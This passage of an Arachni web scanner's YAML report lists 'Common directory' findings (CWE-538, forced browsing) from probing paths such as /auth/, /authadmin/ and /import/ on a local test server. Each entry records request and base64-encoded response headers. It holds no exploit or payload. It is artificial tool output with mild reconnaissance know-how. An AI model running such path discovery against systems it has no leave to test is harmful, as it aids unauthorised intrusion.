!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/services/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/services/
injected: services
id: services
elem: path
remarks: {}
method: ''
response: services
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/report/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/report/
injected: report
id: report
elem: path
remarks: {}
method: ''
response: report
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/reports/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/reports/
injected: reports
id: reports
elem: path
remarks: {}
method: ''
response: reports
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/purchase/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/purchase/
injected: purchase
id: purchase
elem: path
remarks: {}
method: ''
response: purchase
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/retail/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/retail/
injected: retail
id: retail
elem: path
remarks: {}
method: ''
response: retail
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/reseller/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/reseller/
injected: reseller
id: reseller
elem: path
remarks: {}
method: ''
response: reseller
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/app/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/app/
injected: app
id: app
elem: path
remarks: {}
method: ''
response: app
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/beta/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/beta/
injected: beta
id: beta
elem: path
remarks: {}
method: ''
response: beta
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/boot/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/boot/
injected: boot
id: boot
elem: path
remarks: {}
method: ''
response: boot
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/bug/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/bug/
injected: bug
id: bug
elem: path
remarks: {}
method: ''
response: bug
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/bugs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/bugs/
injected: bugs
id: bugs
elem: path
remarks: {}
method: ''
response: bugs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/buy/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/buy/
injected: buy
id: buy
elem: path
remarks: {}
method: ''
response: buy
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/auth/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/auth/
injected: auth
id: auth
elem: path
remarks: {}
method: ''
response: auth
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/authadmin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/authadmin/
injected: authadmin
id: authadmin
elem: path
remarks: {}
method: ''
response: authadmin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/import/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/import/
injected: import
id: import
elem: path
remarks: {}
method: ''
response: import
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
